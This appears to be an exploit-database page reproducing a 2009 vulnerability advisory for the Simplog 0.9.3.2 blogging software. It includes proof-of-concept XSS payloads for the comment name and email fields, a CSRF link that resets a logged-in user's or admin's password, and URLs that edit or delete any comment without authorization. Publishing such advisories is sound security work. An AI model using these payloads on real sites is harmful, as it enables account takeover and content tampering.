header-logo
Suggest Exploit
vendor:
Simplog
by:
Amol Naik
8.8
CVSS
HIGH
Persistent Cross-site Scripting, Cross Site Request Forgery, Edit/Delete Comments (Bypassing Authorization)
79,352,285
CWE
Product Name: Simplog
Affected Version From: 0.9.3.2
Affected Version To: 0.9.3.2
Patch Exists: NO
Related CWE: N/A
CPE: a:simplog:simplog:0.9.3.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Multiple Vulnerabilities in Simplog v0.9.3.2

When adding a comment for any blog entry, it is possible to add a Persistent XSS payload in 'Name' & 'Email' parameters due to improper sanitization of the user inputs. This application is vulenrable to CSRF which changes the password of an authenticated user. This is applicable to Admin as well. It is possible to edit/delete comments without proper authorization.

Mitigation:

Ensure that user input is properly sanitized and validated. Implement proper authorization checks for editing/deleting comments.
Source

Exploit-DB raw data:

################################################################################
Mutliple Vulnerabilities in Simplog v0.9.3.2

Name Multiple vulnerabilities in Simplog
Systems Affected Simplog 0.9.3.2 and possibly earlier versions
Download http://sourceforge.net/projects/simplog/files/simplog/0.9.3.2/simplog-0.9.3.2.tar.gz/download
Author Amol Naik (amolnaik4[at]gmail.com)
Date 16/11/2009
################################################################################


############
1. OVERVIEW
############

Simplog provides an easy way for users to add blogging capabilities to their existing websites.
Simplog is written in PHP and compatible with multiple databases.
Simplog also features an RSS/Atom aggregator/reader.

###############
2. DESCRIPTION
###############

Simplog is vulnerable to Persistent cross-site scripting, cross-site request forgery and unauthorized comment deletion.

######################
3. TECHNICAL DETAILS
######################

Summery:

(A) Persistent Cross-site Scripting
(B) Cross Site Request Forgery
(C) Edit/Delete Comments (Bypassing Authorization)


(A) Persistent Cross-site Scripting
++++++++++++++++++++++++++++++++++++

Vulnerable page comments.php
Vulnerable Parameters cname, email

When adding a comment for any blog entry, it is possible to add a Persistent XSS payload in "Name" & "Email" parameters due to improper sanitization of the user inputs.

++++
POC
++++

Put this in the comment:

Name: alert("AMol_NAik")
email:">alert("AMol_NAik")


(B) Cross Site Request Forgery
+++++++++++++++++++++++++++++++

Vulnerable Page user.php

This application is vulenrable to CSRF which changes the password of an authenticated user. This is applicable to Admin as well.

++++
POC
++++

http://server/simplog/user.php?pass1=&pass2=&blogid=&act=change


For example, if an authenticated user clicks on the below link, his/her password changes to "AMol_NAik".

http://server/simplog/user.php?pass1=AMol_NAik&pass2=AMol_NAik&blogid=1&act=change


(C) Edit/Delete Comments (Bypassing Authorization)
+++++++++++++++++++++++++++++++++++++++++++++++++++

Vulnerable Page comments.php
Vulnerable Parameters op, cid

The application provides a function to edit n delete the comments to Blog Admin. It is possible for attacker to edit/delete any comment due to improper authorization.

++++
POC
++++

Edit comment: http://server/simplog/comments.php?op=edit&cid=
Delete Comment: http://server/simplog/comments.php?op=del&cid=


############
4. TimeLine
############

03/11/2009 Bug Discovered
03/11/2009 Reported to Vendor
16/11/2009 No response received till the date
16/11/2009 Public Disclosure